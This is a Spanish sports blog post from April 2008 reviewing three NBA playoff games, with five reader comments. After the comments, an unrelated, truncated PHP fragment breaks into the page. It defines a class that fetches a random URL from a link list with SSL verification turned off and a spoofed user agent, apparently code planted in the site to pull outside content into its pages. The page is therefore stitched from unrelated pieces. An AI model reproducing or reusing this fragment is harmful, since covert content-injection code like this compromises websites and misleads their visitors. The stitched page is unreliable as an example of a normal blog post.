Redención

25 de April de 2008 por txusma

bt Txusma, TheDeerHunter & Queko

Calderón Y Ford, Ford Y Calderón (ORL 94 – TOR 108)

Sam Mitchell ha convertido en defecto lo que es una de las grandes virtudes de su equipo: poseer 2 bases de primerísimo nivel, capaces de aportar cosas diferentes al juego e impregnarlo con su personal estilo. Lo mínimo que se le pide al entrenador es que sepa gestionar su plantilla y conocer a sus jugadores, que sea capaz de leer los partidos y utilizar adecuadamente los recursos disponibles. Ayer, al contrario que en los últimos partidos, lo consiguió, principalmente porque Ford y Calderón le ayudaron. Desoyendo a aficionados y periodistas, Mitchell volvió a situar a TJ de titular y este le agradeció el gesto: 21 puntos, incluyendo 9 consecutivos al final del segundo cuarto que rompieron el partido e hicieron enloquecer el Air Canda Center. Esta es la labor que mejor desempeña TJ Ford, auténtico microondas, capaz de despegarte o acercarte al rival con una racha magnífica, de contagiar a los compañeros con 3 tiros y 2 penetraciones sublimes. Pero si Ford “gana” cuartos, Calderón gana partidos. Anoche volvió a dar toda una exhibición de liderazgo, visión de juego y puntería en los momentos decisivos. Penetró y dobló el balón una y otra vez encontrando a los Parker, Kapono, Delfino y compañía, llevó a cabo pick&rolls devastadores con Chris Bosh, clavó auténticos triplazos cuando más necesarios eran, jugó los últimos minutos con aplomo y experiencia… en definitva un partido perfecto con el se ganó aún más a los aficionados que abarrotaban el pabellón.

Con la pareja de bases funcionado a pleno rendimiento todo fue más fácil para Toronto desde el principio y en general todos los jugadores cuajaron un buen partido. Como novedad, Jamario Moon salió de titular en lugar de Nesterovic, lo que fue todo un acierto, por que el participante del concurso del mates aportó una gran intensidad defensiva y un buen primer cuarto en ataque. El que empieza a presentar serias dudas es el teórico jugador franquicia Chris Bosh. Ayer anotó mayoritariamente gracias a los pases de Calderón y se emperró en tirar desde fuera una y otra vez, no intentando en ningún momento superar a Dwight Howard en el poste bajo, al menos para intentar sacarle alguna falta. Se ha de esperar más de él al igual que de Bargnani que resulta casi intrascendente en el desarrollo del juego (0 rebotes al final del choque).

Orlando salió dormido el primer cuarto y tan solo el acierto de Dwight Howard lo mantuvo en el partido. Su juego se basa en un dentro-fuera, de manera que el acierto en triple se antoja fundamental y ayer no se dio el caso en ningún momento, por lo que no pudieron hacer otra cosa que ir a remolque en el marcador. Lo que cuesta entender es que en este juego tan basado en el triple no tenga un hueco JJ Redick y si Keith Bogans o Keyon Dooling, que se antojan peores tiradores. En la segunda parte, Howard desapareció y todo el caudal ofensivo pasó por las manos de un Hedo Turkoglu irreconocible respecto el año pasado. El Turco es el auténtico líder del equipo y ejerce de anotador, reboteador y base de su equipo con mucha inteligencia, más si cabe por los problemas físicos de Jameer Nelson. En todo caso, Orlando sigue pareciendo superior y con tan solo un poco más de acierto en tiro exterior ayer el resultado podría haber sido muy distinto. Veamos que nos depara el siguiente partido.

Noche de Redención (HOU 94 – UTA 92)

Muchos palos le han llovido a McGrady en los últimos tiempos. Su patético 0-7 acumulado en los 2 últimos cuartos de los primeros partidos de esta serie no había ayudado precisamente a aplacar los ánimos contra él. El otro día lanzabamos una pregunta ¿puede levantarse (moralmente) alguien después de todos los batacazos que ha sufrido él? La respuesta: 27 puntos (7 de ellos en el último cuarto), 5 rebotes, 7 asistencias y por fin… victoria.

No es que anoche T-Mac estuviera espectacularmente fino, más bien estuvo algo errático en eficacia de tiro, pero el valor de su actuación debe enmarcarse en su lucha interna consigo mismo y con los clichés que arrastra. No cabe duda de que fue fundamental para esta decisiva victoria. Y es que, si bien, suele ser normal que se note una cierta bajada en intensidad en los equipos que van ganando una serie 2-0, el hecho de empezar perdiendolo todo en casa suele terminar en una barrida la gran mayoría de las veces, más aún, si el equipo que tienes enfrente suele ganarlo todo lo que juega como local.

El partido de anoche es mucho más importante de lo que parece. De tenerlo todo hecho, Utah se encuentra con que inesperadamente ha perdido el tercero y que ahora existe una posibilidad de que se le complique muy mucho la eliminatoria, hasta el punto de perder la tan importante ventaja campo y que tan “poco” esfuerzo les había costado lograr. Lo que ayer era imposible hoy es… ¿inminente? Es en este punto donde entran dudas. El otro equipo se refuerza con un jugador importante, Rafer Alston, que para colmo tiene un impacto súbito en el juego del rival. Determinados jugadores dan un paso adelante… Scola, que por calidad no tiene nada que envidiar a tus pívots; Shane Battier cuya intensidad se contrapone a la indolencia de Kirilenko, Carl Landry, Bobby Jackson…

No obstante, Utah ha demostrado suficientes garantías. Sobre el papel son superiores y a priori lo dejarán todo cerrado en el cuarto, pero también eran superiores en temporada regular y perdieron la ventaja campo. Cuidadito si vuelven a Houston habiéndosela devuelto. El “No subestimes el corazón del campeón” resuena en nuestras cabezas.

Lebron “Overrated” James (CLE 72 – WAS 108)

Curioso. En los partidos previos todo tipo de provocaciones y casi-agresiones para sacar de los partidos a Lebron fue la única estrategia que mostró Washington. Ni por asomo plantearse que esto del baloncesto a veces se gana jugando… qué idea más extraña. Consecuencia: Lebrón cabreado y paliza haciendo dos pedazos de partidos de super-hombre “chosen-one”. Pero anoche la eliminatoria dio un vuelco. “Sobrevalorado” Lebron noz dejó un partido más bien foljo para lo que nos tiene acostumbrados pero en su defensa hay q admitir que, a excepción de Devin Brown, el resto de sus compañeros no salieron del vestuario y debieron pensar que sólo vale la pena jugar en Cleveland.

Lo de Washington fue aún más sorprendente. Arenas sale de titular después de muchos meses, se lesiona tras 10 minutos de juego y en el equipo se ponen a aportar todos: Deshawn 19 puntacos, Roger Mason 18, Butler 17, Jamison 15, Haywood 14, ¡qué barato iba el pescado anoche!. Lo de Arenas empieza a ser bastante mala suerte pero ya hay voces que comentan que el equipo juega mejor sin él que con él. De momento son sólo comentarios dispersos así que seguimos admintiendo que es un gran jugador y un ALL-STAR muy guayón que tiene blog y todo.

Lo de anoche, más allá de la derrota que es hasta cierto punto lógica en tales circunstancias y no especialmente importante, fue un partido completamente indigno para un teórico candidato a la final de conferencia y para un teórico candidato a llegar a ser una leyenda del baloncesto. Lo peor no es la derrota sino la actitud y la mutación que experimentó Cleveland de un día para otro. Más grave todavía para Lebron y los suyos es la pobre aportación del equipo en sí, que ya no es cuestión de un accidente como el de anoche. La imagen que dan es de bastante vulnerabilidad y tampoco da la sensación que las adquisiciones hayan mejorado lo que había.

Llama la atención, a excepción de Boston que sí lo tiene claro, que parece que los equipos no han ponderado lo imporante que va a ser para el final el número de partidos acumulados durante estos playoffs.
Supongo que Cleveland terminará imponiéndose, pero la metida de pata de anoche es de campeonato.

Comenta

5 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Calderón dejo claro ayer que el debe ser el base titular y TJ el que salga a revolucionar 15 minutos, estuvo perfecto. A mi Bosh no me crea excesivas dudas, en el 2º partido estuvo soberbio, antes de la elección de Bargnani dijo que el preferia a LaMarcus porque el no era center, necesita un hombre interior que intimide y sea capaz de defender a tipos como Howard, y no lo hay en los Raptors.

    Sorpresón de los Rockets, me alegro mucho por T-Mac, ojalá tengamos eliminatoria como parece que la tendremos en el Wizars-Cavs.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Por qué dicen “defense” cuando quieren decir “beat L.A.”?

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    Bien los,,,wizards,,,quemando a Lebron,,aunque sea sólo el vello del brazo

      Citar

  4. Gallis dice:
    #4

    Bueno, resultados previsibles en Toronto y Washington y sorpresón en Utah.

    Los Raptors se dieron cuenta de que haciendo las cosas bien hay más posibilidades de ganar, pero aún a pesar de su muy mal partido, un poquitito de acierto en los triples hubiera metido a Orlando muy en el partido. Toronto debe aumentar su intensidad defensiva para tener posibilidades reales.

    En Washington, como decis, se han dado cuenta de que es importante aquello de menos hablar, más trabajar. Y eso sin Arenas, prácticamente. Lo de Cleveland es tremendo. Cuando dimiten, dimiten a lo bestia, jojojojo.

    Y en Utah, Expediente X al cuadrado…lo de los Rockets es brutal (y estas son las cosas por las que, pese a todo, T-Mac mola mogollón) y lo de los Jazz no menos brutal. A ver que pasa en el cuarto, pero lo suyo es que esto no haya sido más que un exceso de confianza, algo por otro lado raro con Sloan de por medio.

      Citar

  5. txusma dice:
    #5

    A Bosh no se le achaca falta de calidad pero su primer partido y este ultimo han sido mas bien flojos. A lo mejor mirando las estadisticas no lo parece pero ayer es que solo metio las q Calderon y compañia le dejaron en bandeja, poca cosa más. Lo q esta claro es q si en esta eliminatoria Toronto tuviera un pivot capaz de defender minimamente a Howard y de anclarlo en ataque, Bosh aumentaria sus numeros pq ningun jugador de Orlando podria defendelor eficazmente pero… no esta. A se mueve Toronto en ese sentido o se desaprovecha a Bosh

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>